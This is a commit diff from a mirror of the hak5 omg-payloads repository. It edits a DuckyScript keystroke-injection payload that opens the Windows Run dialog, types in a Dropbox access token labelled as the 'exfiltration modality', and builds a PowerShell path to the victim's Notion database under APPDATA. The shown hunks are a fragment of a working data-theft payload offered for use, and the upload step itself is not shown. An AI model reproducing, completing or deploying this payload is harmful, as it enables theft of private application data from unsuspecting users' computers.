mirror of https://github.com/hak5/omg-payloads.git
Update payload.txt
parent
d12271c1c5
commit
4f7713cda7
|
@ -15,7 +15,7 @@ REM - Internet Connection
|
|||
|
||||
|
||||
REM You must define your Dropbox accessToken or modify the exfiltration modality.
|
||||
DEFINE DROPBOX_ACCESS_TOKEN example
|
||||
DEFINE #DROPBOX_ACCESS_TOKEN example
|
||||
|
||||
GUI r
|
||||
DELAY 1000
|
||||
|
@ -24,13 +24,10 @@ ENTER
|
|||
DELAY 2000
|
||||
|
||||
REM Setting about exfiltration
|
||||
STRING $accessToken = "
|
||||
STRING DROPBOX_ACCESS_TOKEN
|
||||
STRING "
|
||||
ENTER
|
||||
STRINGLN $accessToken = "#DROPBOX_ACCESS_TOKEN"
|
||||
|
||||
REM Settings about Notion DB
|
||||
STRINGLN
|
||||
STRINGLN_BLOCK
|
||||
$NotionPath = Join-Path -Path $env:APPDATA -ChildPath 'Notion'
|
||||
$NotionDatabasePath = Join-Path -Path $NotionPath -ChildPath "notion.db"
|
||||
|
||||
|
|
Loading…
Reference in New Issue